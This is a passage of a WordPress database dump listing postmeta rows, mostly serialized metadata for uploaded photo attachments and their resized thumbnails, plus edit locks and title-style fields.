(5539,1983,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:37:\"2025/08/LINE_ALBUM_12868_250813_9.jpg\";s:8:\"filesize\";i:380206;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_9-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15723;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_9-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112330;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7881;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_9-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70207;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_9-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:214442;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_9-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18760;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5540,1982,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_11.jpg\";s:8:\"filesize\";i:405616;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_11-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16433;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_11-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120472;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8023;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_11-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75001;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_11-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:229348;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_11-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19716;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5541,1984,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_10.jpg\";s:8:\"filesize\";i:398557;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_10-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16297;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_10-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117563;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8129;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_10-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73257;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_10-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:224493;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_10-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19538;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5542,1985,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_7.jpg'),
(5543,1985,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:37:\"2025/08/LINE_ALBUM_12868_250813_7.jpg\";s:8:\"filesize\";i:360537;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_7-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14658;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_7-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107874;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7536;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_7-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67535;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_7-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:205033;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_7-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17916;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5544,1986,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_8.jpg'),
(5545,1986,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:37:\"2025/08/LINE_ALBUM_12868_250813_8.jpg\";s:8:\"filesize\";i:399798;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_8-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16322;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_8-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120650;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7865;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_8-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75386;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_8-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:227648;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_8-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20216;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5546,1987,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_6.jpg'),
(5547,1987,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:37:\"2025/08/LINE_ALBUM_12868_250813_6.jpg\";s:8:\"filesize\";i:347930;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14921;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_6-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104397;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8412;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_6-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65739;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_6-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197555;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_6-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17857;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5548,1988,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_3.jpg'),
(5549,1989,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_5.jpg'),
(5550,1988,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:37:\"2025/08/LINE_ALBUM_12868_250813_3.jpg\";s:8:\"filesize\";i:336653;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13242;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_3-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95910;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7455;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59659;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_3-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:186823;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_3-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15990;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5551,1989,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:37:\"2025/08/LINE_ALBUM_12868_250813_5.jpg\";s:8:\"filesize\";i:373064;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_5-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15438;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_5-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:113299;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7737;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_5-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71060;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_5-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212920;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_5-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18770;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5552,1990,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_1.jpg'),
(5553,1991,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_4.jpg'),
(5554,1990,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:37:\"2025/08/LINE_ALBUM_12868_250813_1.jpg\";s:8:\"filesize\";i:347267;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15132;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105584;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7573;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66825;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198012;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_1-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18248;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5555,1991,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:37:\"2025/08/LINE_ALBUM_12868_250813_4.jpg\";s:8:\"filesize\";i:336639;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14277;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_4-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100807;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7551;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_4-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63318;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_4-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:191030;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_4-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17271;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5556,1992,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_2.jpg'),
(5557,1992,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:37:\"2025/08/LINE_ALBUM_12868_250813_2.jpg\";s:8:\"filesize\";i:343199;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14431;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103404;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7137;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64818;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:195501;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"LINE_ALBUM_12868_250813_2-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17558;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5559,1944,'_thumbnail_id','1986'),
(5560,1944,'_edit_last','1'),
(5561,1944,'title_style','default'),
(5562,1944,'_title_style','field_5d1a0217cf408'),
(5563,1944,'related',''),
(5564,1944,'_related','field_603b51c3e183e'),
(5565,1993,'title_style','default'),
(5566,1993,'_title_style','field_5d1a0217cf408'),
(5567,1993,'related',''),
(5568,1993,'_related','field_603b51c3e183e'),
(5570,1936,'_thumbnail_id','1940'),
(5575,1995,'_edit_lock','1756279481:1'),
(5576,1996,'_wp_attached_file','2025/08/17-68.png'),
(5577,1996,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:707;s:6:\"height\";i:1000;s:4:\"file\";s:17:\"2025/08/17-68.png\";s:8:\"filesize\";i:738070;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"17-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:93770;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"17-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37926;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"17-68-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:96621;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5579,1995,'_thumbnail_id','1996'),
(5580,1995,'_edit_last','1'),
(5581,1995,'title_style','default'),
(5582,1995,'_title_style','field_5d1a0217cf408'),
(5583,1995,'related',''),
(5584,1995,'_related','field_603b51c3e183e'),
(5585,1997,'title_style','default'),
(5586,1997,'_title_style','field_5d1a0217cf408'),
(5587,1997,'related',''),
(5588,1997,'_related','field_603b51c3e183e'),
(5589,1998,'title_style','hidden'),
(5590,1998,'_title_style','field_5d1a0217cf408'),
(5592,2000,'title_style','hidden'),
(5593,2000,'_title_style','field_5d1a0217cf408'),
(5601,2002,'_edit_lock','1757575794:1'),
(5602,2003,'_wp_attached_file','2025/09/546057733_1370770235048862_2315989396339135817_n.jpg'),
(5603,2003,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:60:\"2025/09/546057733_1370770235048862_2315989396339135817_n.jpg\";s:8:\"filesize\";i:2079640;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"546057733_1370770235048862_2315989396339135817_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20756;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"546057733_1370770235048862_2315989396339135817_n-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147089;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"546057733_1370770235048862_2315989396339135817_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9212;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"546057733_1370770235048862_2315989396339135817_n-768x512.jpg\";s:5:\"width